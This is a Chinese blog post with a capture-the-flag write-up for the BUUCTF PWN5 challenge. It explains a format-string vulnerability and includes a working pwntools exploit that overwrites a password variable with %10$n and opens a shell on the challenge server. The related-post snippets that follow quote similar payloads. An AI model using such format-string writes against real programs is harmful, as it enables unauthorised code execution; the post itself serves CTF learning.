[第五空间2019 决赛]PWN5 1

已于 2023-04-15 23:54:30 修改
阅读量1.3k 收藏 10
点赞数 9
分类专栏: pwn 文章标签: pwn
于 2021-05-19 21:44:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hahahaboooo/article/details/117046925
版权

首先checksec一下:

32位程序,有canary

放进ida里看一下:

先写入buf,随后又printf(buf),明显的格式化字符串漏洞。

再看一下程序流程:如果nptr也就是输入的密码和0x804c044下的数字相同,则成功。

因此我们可以通过%n来修改0x804c044上的数达到自己的目的。

首先了解一下什么是%n。

%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置,例如:printf("0x44444444%2$n")意思就是说在打印出0x4444这个字符后,将“0x44444444”所输入的字符数量(此处是4)写入到%2$n所指的地址中.

因此,我们先利用AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x来找到printf参数存放地址:

A的ascll码为41,因此偏移值为10。

这样,我们可以先把0x804c044这个地址先写到偏移值为10的地址中,然后利用%10$n把4写入到这个地址中去,然后再将密码写为4就可以达到目的了。

exp:

from pwn import *
#r=process('./8')
r=remote('node3.buuoj.cn',26479)

target=0x804c044
pay=p32(target)+b'%10$n'       #由于在%10$n之前已经写入了0x804C044 为4字节,  因此%10$n:将%10n之前printf已经打印的字符个数"4"赋值给偏移处指针所指向的地址位置    
r.recvuntil(':')
r.sendline(pay)
#gdb.attach(r)
r.recvuntil(':')
r.sendline(str(4))     #写入了四字节,因此此处应写入4
r.interactive()

解出即可。

zenitm
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4200
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
ciscn-2019-pwn
11-29
1. baby_pwn 2. bms 3. daily 4. Double 5 your_pwn
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
buuctf之[第五空间2019 决赛]PWN5
最新发布
weixin_54452942的博客
04-01 546
简单易懂~
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 966
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
[BUUCTF]-PWN:[第五空间2019 决赛]PWN5解析
2301_79326813的博客
12-14 282
这里之所以能这样利用是利用了动态链接的延迟绑定,当函数第一次调用时会把该函数真正的地址写入got表内,之后的调用都会从got表内存的地址去调用,大致是plt->got->addr,atoi的plt表里存的是atoi的got地址,atoi的got里存的是atoi在程序中的真正地址,我们修改atoi的got的内容,那他在调用atoi的plt时就会直接调用system的plt,system的plt就会调用system的got,从而实现调用system函数。这里有大致有两种思路,都运用了格式化字符串漏洞。
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1079
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
buuctf [第五空间2019 决赛]PWN5 1 wp
qq_45895967的博客
07-20 561
from pwn import* io=remote(‘node4.buuoj.cn’,29463) addr=0x0804C044 payload=p32(addr) payload+=’%10$n’ io.sendlineafter(‘name:’,payload) payload=str(0x4) io.sendlineafter(‘passwd:’,payload) io.interactive()
第五空间2019_决赛_PWN5
z1r0的博客
12-04 227
第五空间2019_决赛_PWN5 查看保护 开了canary和NX 23行有一个格式化字符串漏洞,测出偏移为10,32位程序的话直接用pwntools的工具fmtstr_payload,没有开pie,所以将unk_804c044这里给覆盖成自己想要的值,然后输入password就可以get_shell。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug =
[第五空间2019 决赛]PWN5
qq_53928256的博客
10-07 226
由于输入四个地址,对应输出16个字节,也就是将每个地址(即0x804C044~0x804C047)的内容修改为。由于我们将这四个地址(即0x804C044~0x804C047)存储的内容均修改为0x10,所以变量。偏移量为10,所以我们只需要对第10个到第13个参数对应的内容的地址进行修改即可;所以我们可以通过格式化字符串漏洞的任意地址修改更改地址。被存储到了第10个栈参数的位置,所以对应的偏移为10。然后将这4个地址对应的存储位置,通过。将对应地址内容修改为输出的字符个数;读出的4个字节的内容即为。
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWN——[第五空间2019 决赛]PWN5
有头发的埼玉
11-14 458
完全通过静态分析得到题解,与网传算法不同
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 396
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值